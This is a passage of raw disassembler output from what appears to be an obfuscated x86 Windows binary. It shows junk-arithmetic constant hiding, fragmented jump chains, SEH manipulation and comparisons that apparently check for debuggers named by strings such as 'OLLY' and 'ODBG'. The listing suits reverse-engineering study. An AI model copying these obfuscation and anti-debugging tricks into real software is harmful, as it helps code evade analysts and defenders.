mov eax, [ebp+var_8]
jmp loc_423090
; END OF FUNCTION CHUNK FOR sub_4254D3
; ---------------------------------------------------------------------------
loc_425DDD: ; CODE XREF: _0182ofla:00423BC7�j
sub edx, ecx
; =============== S U B R O U T I N E =======================================
sub_425DDF proc near ; CODE XREF: sub_423D2D+24DA�p
; FUNCTION CHUNK AT 0042394F SIZE 00000006 BYTES
mov [esp+0], ecx
pop ecx
add eax, 3Ch
mov eax, [eax]
jmp loc_42394F
sub_425DDF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_425DED: ; CODE XREF: sub_4298DD:loc_42D3C9�j
push 99741098h
pop ecx
sub ecx, 0A640463h
or ecx, 0B18157EEh
add ecx, 40B10FB1h
jmp loc_42C12D
; END OF FUNCTION CHUNK FOR sub_4298DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_425E0B: ; CODE XREF: _0182ofla:0042CE2D�j
jge loc_4284D7
and eax, ebp
; =============== S U B R O U T I N E =======================================
sub_425E13 proc near ; CODE XREF: sub_42A760+1C44�p
; FUNCTION CHUNK AT 0042C386 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042EC5B SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push ebp
jmp loc_42EC5B
sub_425E13 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C565
loc_425E1D: ; CODE XREF: sub_42C565:loc_42E2E3�j
lea eax, [ebp-20h]
push eax
; END OF FUNCTION CHUNK FOR sub_42C565
; START OF FUNCTION CHUNK FOR sub_42380D
loc_425E21: ; CODE XREF: sub_42380D:loc_428CA7�j
push edx
push 85FD458Bh
pop edx
jmp loc_42B565
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_425E2D: ; CODE XREF: sub_42D833:loc_4234EB�j
sub ebx, 0FD763D4Bh
xor ebx, 0FE7D9384h
loc_425E39: ; CODE XREF: _0182ofla:00423BC1�j
add ebx, 0E5D866AAh
loc_425E3F: ; CODE XREF: sub_42E689:loc_42B6BB�j
xchg ebx, [esp+8+var_8]
jmp sub_424CD8
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_425E48: ; CODE XREF: sub_428041+2AE0�j
jmp sub_4295D6
; END OF FUNCTION CHUNK FOR sub_428041
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425E4D proc near ; CODE XREF: sub_42D0E4+F�j
; sub_42D056:loc_42E038�p
; FUNCTION CHUNK AT 00423846 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425164 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B048 SIZE 00000010 BYTES
push esi
mov [esp+0], ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_425164
sub_425E4D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1D1
loc_425E5C: ; CODE XREF: sub_42C1D1:loc_42C1D6�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
call sub_42912B
loc_425E6B: ; CODE XREF: sub_423FE2+9D75�j
jmp nullsub_94
; END OF FUNCTION CHUNK FOR sub_42C1D1
; ---------------------------------------------------------------------------
loc_425E70: ; CODE XREF: _0182ofla:00428B07�j
jmp loc_42D3ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B02
loc_425E75: ; CODE XREF: sub_427B02+C�j
jmp loc_424307
; END OF FUNCTION CHUNK FOR sub_427B02
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_235. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D950
loc_425E7B: ; CODE XREF: sub_42D950+16�j
jmp loc_42713A
; END OF FUNCTION CHUNK FOR sub_42D950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_425E80: ; CODE XREF: sub_428F20-2F0�j
pop eax
call sub_42A241
loc_425E86: ; CODE XREF: _0182ofla:0042610A�j
jnz loc_425A7C
jmp loc_423AE4
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_425E91: ; CODE XREF: sub_4253F4+585D�j
jnz loc_429A53
loc_425E97: ; CODE XREF: sub_423BD5+D�j
jmp loc_42D5B3
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
sbb esi, edx
; START OF FUNCTION CHUNK FOR sub_428D63
loc_425E9E: ; CODE XREF: sub_428D63:loc_4257DA�j
not eax
jmp loc_429A51
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_425EA5 proc near ; DATA XREF: sub_42561D+2056�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424544 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004252C9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042AAAA SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042AAB3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042CD72 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D455 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E494 SIZE 00000014 BYTES
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_42AAB3
mov eax, [ebp-8]
loc_425EB4: ; CODE XREF: _0182ofla:loc_4256C5�j
jmp loc_424544
sub_425EA5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425EB9: ; CODE XREF: _0182ofla:004233CA�j
pushf
mov [esp], edx
xchg eax, ebp
push ebp
jmp loc_42A57A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425063
loc_425EC5: ; CODE XREF: sub_425063+5C27�j
xchg ebx, [edi]
not eax
push edx
jmp loc_424677
; END OF FUNCTION CHUNK FOR sub_425063
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_425ECF: ; CODE XREF: sub_42798F:loc_428D8D�j
; sub_42380D+7896�j
cmp dword ptr [ebp-8], 0A22F8A70h
jz loc_425EE4
mov eax, [ebp-0Ch]
call sub_424CD8
; END OF FUNCTION CHUNK FOR sub_42798F
; START OF FUNCTION CHUNK FOR sub_4256AD
loc_425EE4: ; CODE XREF: sub_428A39-4CD4�j
; sub_4256AD+D�j ...
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4256AD
; =============== S U B R O U T I N E =======================================
sub_425EEB proc near ; DATA XREF: sub_424289:loc_423955�o
mov [ebp-10h], eax
mov eax, [ebp-10h]
call sub_42931E
sub_425EEB endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425629
loc_425EF6: ; CODE XREF: sub_425629-971�j
jnp loc_42B565
loc_425EFC: ; DATA XREF: sub_4253F4-6D9�o
pop dword ptr fs:0
xchg eax, [esp+4+var_4]
pop eax
add eax, 67904464h
add eax, ebp
add eax, 6D62D30Dh
push eax
jmp loc_4231A4
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_425F1A: ; CODE XREF: sub_42E5F8-4706�j
movzx eax, word ptr [eax+14h]
push offset sub_4243D3
jmp nullsub_173
; END OF FUNCTION CHUNK FOR sub_42E5F8
; ---------------------------------------------------------------------------
jbe loc_42A032
jmp loc_42C978
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_425F33: ; CODE XREF: sub_42660C+BEE�j
jnb loc_428B79
loc_425F39: ; CODE XREF: sub_42660C:loc_429722�j
lea edx, [ebp-14h]
push 6CE131AFh
mov eax, offset sub_427802
call sub_4277FA
loc_425F4B: ; CODE XREF: sub_4255E9+7FF3�j
jmp loc_423008
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D2D
loc_425F50: ; CODE XREF: sub_428D2D+23�j
jmp nullsub_229
; END OF FUNCTION CHUNK FOR sub_428D2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_425F55: ; CODE XREF: sub_428D63+37AC�j
shr edx, 14h
ror edi, 0Bh
loc_425F5B: ; CODE XREF: sub_428D63:loc_4283AF�j
lea eax, [ebp-26Fh]
cmp dword ptr [eax], 4742444Fh
jz loc_42595F
jmp loc_427479
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_425F72: ; CODE XREF: sub_42AAF8+1D68�j
jns loc_42EDC4
ja loc_4297DB
loc_425F7E: ; CODE XREF: sub_423B43+2075�j
; _0182ofla:004265D5�j ...
pop ecx
pop ebp
locret_425F80: ; CODE XREF: sub_425DA5:loc_423A59�j
retn
; END OF FUNCTION CHUNK FOR sub_42AAF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_425F81: ; CODE XREF: sub_4249FA+5294�j
jmp loc_42CE9C
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
loc_425F86: ; CODE XREF: _0182ofla:00426C21�j
jmp loc_42CFD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_425F8B: ; CODE XREF: _0182ofla:004262BA�j
; sub_42D056+11�j
call sub_429071
loc_425F90: ; CODE XREF: sub_42ADE3+26C9�j
jmp nullsub_127
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
mov edi, [eax]
jmp sub_423AB1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_425F9D: ; CODE XREF: sub_423FE2-192�j
jmp loc_42E44B
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
loc_425FA2: ; CODE XREF: _0182ofla:004236EB�j
jmp loc_42AB5A
; ---------------------------------------------------------------------------
loc_425FA7: ; DATA XREF: sub_4231D5+1F69�o
cmp eax, [ebp-8]
jnz loc_4289D3
mov eax, [ebp-14h]
mov eax, [eax+24h]
jmp loc_429DFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_425FBB: ; CODE XREF: sub_42448C+7�j
mov eax, ds:dword_42E8C4
or eax, eax
jnz loc_42832E
jmp loc_42A92B
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
adc eax, ecx
jmp sub_423077
; ---------------------------------------------------------------------------
loc_425FD5: ; DATA XREF: sub_4290AE+7�o
and dword ptr [eax+24h], 7FFFFFFFh
push 3E7676E6h
pop eax
xor eax, 0D4E0217h
add eax, ebp
jmp loc_42784D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AD5
loc_425FEF: ; CODE XREF: sub_427AD5�j
call sub_426BDA
loc_425FF4: ; CODE XREF: sub_42DEBF+15�j
jmp loc_42637B
; END OF FUNCTION CHUNK FOR sub_427AD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BCE
loc_425FF9: ; CODE XREF: sub_426BCE+7�j
jmp nullsub_226
; END OF FUNCTION CHUNK FOR sub_426BCE
; ---------------------------------------------------------------------------
loc_425FFE: ; CODE XREF: _0182ofla:004296EB�j
and edx, 3BA7E65Fh
rol edx, 18h
add edx, 51BD14ABh
call sub_42D71D
jmp loc_42681C
; =============== S U B R O U T I N E =======================================
sub_426017 proc near ; CODE XREF: sub_42448C:loc_42626A�p
mov [esp+0], eax
call sub_424CD8
retn
sub_426017 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426020 proc near ; CODE XREF: sub_428729+460B�p
; FUNCTION CHUNK AT 004232EC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004278D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427F51 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042AEFC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042CEFD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D395 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042D703 SIZE 00000006 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42D395
sub_426020 endp
; ---------------------------------------------------------------------------
loc_42602B: ; CODE XREF: _0182ofla:0042B68B�j
xor ecx, 8F7B3252h
or edx, 0B5AC03F1h
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_426037: ; CODE XREF: sub_423A2A:loc_42B67E�j
add ebx, 404D0B65h
popf
xchg ebx, [esp+0]
jmp sub_4265C0
; END OF FUNCTION CHUNK FOR sub_423A2A
; =============== S U B R O U T I N E =======================================
sub_426046 proc near ; CODE XREF: sub_42349B+18BF�p
; _0182ofla:0042CAE2�j
xchg esi, [esp+0]
pop esi
xor edx, edx
div ecx
push offset aIurlmGsHofbSi ; "‰Uà‹Mìƒá\ahŽFÄéI-"
jmp nullsub_24
sub_426046 endp
; ---------------------------------------------------------------------------
loc_426058: ; CODE XREF: _0182ofla:0042C900�j
jp loc_42ADDC
mov [ebp+0], esi
loc_426061: ; CODE XREF: _0182ofla:loc_424A18�j
cmp dword ptr [ebp-10h], 0
setnz byte ptr [ebp-5]
; START OF FUNCTION CHUNK FOR sub_42798F
loc_426069: ; CODE XREF: sub_42798F:loc_427AEC�j
; sub_42798F+F54�j ...
mov al, [ebp-5]
jmp loc_423F2D
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42968B
loc_426071: ; CODE XREF: sub_42968B-4504�j
mov [ecx], eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42968B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_426075: ; CODE XREF: sub_42968B+6�j
; sub_42326C+9840�j
rol eax, 11h
xchg eax, ebp
jmp sub_42458B
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247FE
loc_42607F: ; CODE XREF: sub_4247FE+13�j
jnz loc_4260AA
lea edx, [ebp-14h]
mov eax, offset dword_427A08
call sub_42B14D
lea eax, [ebp-14h]
push eax
jmp loc_42877C
; END OF FUNCTION CHUNK FOR sub_4247FE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42609B proc near ; CODE XREF: sub_4247FE�j
push ebp
mov ebp, esp
jmp loc_42DB44
sub_42609B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247FE
loc_4260A3: ; CODE XREF: sub_4247FE+5F55�j
xor edx, edx
call sub_42B14D
loc_4260AA: ; CODE XREF: sub_4247FE:loc_42607F�j
; sub_42926C+A�j
mov eax, ds:dword_427A14
mov [ebp-4], eax
mov eax, [ebp-4]
mov esp, ebp
pop ebp
jmp loc_4250CA
; END OF FUNCTION CHUNK FOR sub_4247FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C415
loc_4260BD: ; CODE XREF: sub_42C415:loc_42B213�j
push edi
or ebx, 0C4319744h
jmp loc_424037
; END OF FUNCTION CHUNK FOR sub_42C415
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_231. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_4260CB: ; CODE XREF: sub_42660C:loc_4231BD�j
call sub_428D17
mov edx, 0F25CB94Fh
call sub_42D71D
push esi
push 0CD64D6CBh
jmp loc_42B490
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_4260E5: ; CODE XREF: sub_425BF8:loc_42567C�j
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_42AE31
call sub_425AE5
loc_4260F6: ; CODE XREF: sub_429E52-34D2�j
jmp loc_42CC29
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FFB
loc_4260FB: ; CODE XREF: sub_423FFB+13�j
jmp nullsub_26
; END OF FUNCTION CHUNK FOR sub_423FFB
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jz loc_42C390
jmp loc_425E86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240FC
loc_42610F: ; CODE XREF: sub_4240FC:loc_42D1F8�j
cmp eax, [ebp-8]
jnz loc_4289D3
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
call sub_4286C8
; END OF FUNCTION CHUNK FOR sub_4240FC
; START OF FUNCTION CHUNK FOR sub_42DDA6
loc_426126: ; CODE XREF: sub_42DDA6+7�j
jmp loc_42801D
; END OF FUNCTION CHUNK FOR sub_42DDA6
; ---------------------------------------------------------------------------
loc_42612B: ; CODE XREF: _0182ofla:loc_42A872�j
add ebx, 7E32CCFEh
sub ebx, 2992300Eh
and esi, edx
jmp loc_42E9CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42613E: ; CODE XREF: sub_429E52-664A�j
push ecx
jmp loc_424E11
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
loc_426144: ; CODE XREF: _0182ofla:00426D46�j
jz loc_42B02D
or edi, 3E9EC403h
sub eax, 12DCE79h
jg loc_42AAB6
jmp loc_42C5D0
; ---------------------------------------------------------------------------
loc_426161: ; CODE XREF: _0182ofla:00429CC7�j
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
jmp loc_42C7E2
; ---------------------------------------------------------------------------
loc_426180: ; DATA XREF: sub_4258B7+9�o
pushf
mov [esp], ecx
call sub_428447
; START OF FUNCTION CHUNK FOR sub_428F20
loc_426189: ; CODE XREF: sub_428F20-29D7�j
jmp nullsub_130
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_42618E: ; CODE XREF: sub_42938A:loc_428990�j
and edx, 72DACD82h
jmp loc_4242C4
; END OF FUNCTION CHUNK FOR sub_42938A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4256E8
loc_426199: ; CODE XREF: sub_4256E8+8�j
pop ebx
or ebx, 6E0EBAA5h
sub ebx, 0C3254C7Fh
push offset loc_42AD14
jmp nullsub_182
; END OF FUNCTION CHUNK FOR sub_4256E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_4261B0: ; CODE XREF: sub_428F46:loc_424164�j
call sub_427B02
jmp loc_42E4C2
; END OF FUNCTION CHUNK FOR sub_428F46
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42931E
loc_4261BB: ; CODE XREF: sub_42931E+D�j
jmp loc_426E74
; END OF FUNCTION CHUNK FOR sub_42931E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_4261C0: ; CODE XREF: sub_425B00:loc_425C50�j
pop ecx
mov [ebp-20h], eax
jmp loc_428A5A
; END OF FUNCTION CHUNK FOR sub_425B00
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4261C9 proc near ; CODE XREF: sub_425B00+2E43�p
push ebp
mov ebp, esp
jmp sub_426DC3
sub_4261C9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C1A
loc_4261D1: ; CODE XREF: sub_429C1A+6�j
mov dword ptr [eax], 594C4C4Fh
lea eax, [ebp-1Ch]
mov dword ptr [eax], 474244h
push 0
jmp loc_424C7F
; END OF FUNCTION CHUNK FOR sub_429C1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCE0
loc_4261E7: ; CODE XREF: sub_42CCE0:loc_4272A1�j
jz loc_42D73E
jmp loc_4241FD
; END OF FUNCTION CHUNK FOR sub_42CCE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423D2D
loc_4261F2: ; CODE XREF: sub_423D2D+C�j
call sub_427E81
loc_4261F7: ; DATA XREF: sub_423A42:loc_4251E5�o
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_426260
mov eax, [ebp-4]
call sub_425DDF
; END OF FUNCTION CHUNK FOR sub_423D2D
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42620C: ; CODE XREF: sub_428D63-5235�j
; sub_42340D:loc_427264�j ...
mov ecx, [ebp-14h]
push edx
push 2E60A5FFh
pop edx
loc_426216: ; CODE XREF: _0182ofla:loc_423997�j
jmp loc_42DEFA
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1C8
loc_42621B: ; CODE XREF: sub_42E1C8:loc_4257A8�j
add esi, 0A6AFA7B4h
xchg esi, [esp+0]
jmp sub_42C197
; END OF FUNCTION CHUNK FOR sub_42E1C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_426229: ; CODE XREF: sub_42662C+18�j
pop esi
rol esi, 0Ah
or esi, 16343AE1h
xor esi, 0A1BADD2Eh
add esi, ebp
jmp loc_4275F6
; END OF FUNCTION CHUNK FOR sub_42662C
; =============== S U B R O U T I N E =======================================
sub_426240 proc near ; CODE XREF: _0182ofla:00423443�j
; sub_426571+2201�p
; FUNCTION CHUNK AT 0042DBB5 SIZE 00000018 BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp-4]
inc eax
jmp loc_42DBB5
sub_426240 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42624D: ; CODE XREF: sub_426571:loc_42A902�j
mov eax, [ebp-4]
call sub_428EAF
jmp loc_42791B
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA2D
loc_42625A: ; CODE XREF: sub_42DA2D:loc_4268AE�j
add eax, [ebp-4]
mov [ebp-0Ch], eax
; END OF FUNCTION CHUNK FOR sub_42DA2D
; START OF FUNCTION CHUNK FOR sub_424289
loc_426260: ; CODE XREF: sub_424289+B�j
; sub_423D2D+24D1�j ...
mov eax, [ebp-0Ch]
mov esp, ebp
jmp loc_428A49
; END OF FUNCTION CHUNK FOR sub_424289
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42626A: ; CODE XREF: sub_42448C:loc_423E64�j
call sub_426017
loc_42626F: ; CODE XREF: sub_423A2A+49C0�j
jmp loc_4297ED
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_426274: ; CODE XREF: sub_42660C:loc_42E928�j
or edx, esi
jmp loc_4239E7
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
xor edi, 0BE71A1C8h
jmp loc_426E93
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_426286: ; CODE XREF: sub_424184+A251�j
mov ecx, [edx]
jmp sub_4271AD
; END OF FUNCTION CHUNK FOR sub_424184
; =============== S U B R O U T I N E =======================================
sub_42628D proc near ; DATA XREF: sub_4282B8+48E8�o
xchg ebx, [esp+0]
jmp sub_42ECFA
sub_42628D endp
; =============== S U B R O U T I N E =======================================
sub_426295 proc near ; CODE XREF: _0182ofla:00429113�j
; sub_429EF7+B�p
mov [esp+0], ebx
loc_426298: ; CODE XREF: _0182ofla:0042A410�j
pop ebx
add ebx, 0DA21EABBh
mov [ebx], eax
pop ebx
retn
sub_426295 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4262A3: ; CODE XREF: _0182ofla:00423F0C�j
push ebx
push 390DE551h
pop ebx
add ebx, 0C734AF84h
xchg ebx, [esp]
jmp loc_426742
; ---------------------------------------------------------------------------
test al, al
jz loc_425F8B
jmp loc_4252BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_4262C5: ; CODE XREF: sub_42448C+5329�j
call sub_42D81E
test al, al
jnz loc_42419D
loc_4262D2: ; CODE XREF: _0182ofla:loc_423C04�j
; sub_426571-1F74�j ...
pop ecx
push offset sub_42419A
jmp nullsub_59
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428176
loc_4262DD: ; CODE XREF: sub_428176:loc_42ADAB�j
or ecx, 8EDA425Bh
sub ecx, 0BB8ED410h
add ecx, 2CF1BBD4h
xchg ecx, [esp+0]
jmp loc_42B63B
; END OF FUNCTION CHUNK FOR sub_428176
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ED1
loc_4262F7: ; CODE XREF: sub_427ED1+5719�j
call sub_42E403
; END OF FUNCTION CHUNK FOR sub_427ED1
; START OF FUNCTION CHUNK FOR sub_42DF41
loc_4262FC: ; CODE XREF: sub_42DF41+E�j
jmp loc_425B5B
; END OF FUNCTION CHUNK FOR sub_42DF41
; ---------------------------------------------------------------------------
loc_426301: ; CODE XREF: _0182ofla:0042D811�j
add edi, 0B7814546h
push offset loc_423037
jmp loc_42453F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_426311: ; CODE XREF: sub_428D63:loc_426342�j
ror esi, 1Ch
jmp loc_426529
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_426319 proc near ; CODE XREF: sub_42D1C4+7�p
; sub_42DF61+1E�j
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 0042366F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004265BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042759E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427F14 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004280CA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004284CB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042C10E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042C6CC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042EBBC SIZE 00000008 BYTES
mov [esp-10h+arg_C], ebx
pop ebx
push ecx
push eax
sbb edx, eax
jnz loc_42C10E
sbb ecx, 0A742FED9h
jmp loc_427F14
sub_426319 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push eax
ror eax, 1Ah
mov ds:dword_427150, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB4E
loc_42633D: ; CODE XREF: sub_42EB4E+D�j
jmp nullsub_188
; END OF FUNCTION CHUNK FOR sub_42EB4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_426342: ; CODE XREF: sub_428D63-4CF�j
jmp loc_426311
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D730
loc_426347: ; CODE XREF: sub_42D730-A5C0�j
rol eax, 1Ah
push ebx
mov ebx, eax
jmp loc_428F38
; END OF FUNCTION CHUNK FOR sub_42D730
; ---------------------------------------------------------------------------
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_424680
jmp loc_4271C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D81E
loc_426364: ; CODE XREF: sub_42D81E:loc_42CBD6�j
lea eax, loc_426379
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_42D81E
; ---------------------------------------------------------------------------
loc_426374: ; CODE XREF: _0182ofla:0042D005�j
jmp loc_42767D
; ---------------------------------------------------------------------------
loc_426379: ; DATA XREF: sub_42D81E:loc_426364�o
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_427AD5
loc_42637B: ; CODE XREF: sub_427AD5:loc_425FF4�j
pop large dword ptr fs:0
add esp, 4
jmp nullsub_36
; END OF FUNCTION CHUNK FOR sub_427AD5
; ---------------------------------------------------------------------------
test eax, eax
jnz loc_428908
jmp loc_42911F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_426397: ; CODE XREF: sub_42798F+4B8F�j
js loc_42B7E3
add eax, esi
xchg esi, [edi]
jmp loc_42C1F5
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
add edi, ecx
jmp loc_4240F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_4263AD: ; CODE XREF: sub_425BF8:loc_429313�j
; sub_42D056-31CC�j
lea eax, [ebp-26Fh]
cmp dword ptr [eax], 47424454h
jz loc_42595F
jmp loc_42A3A1
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
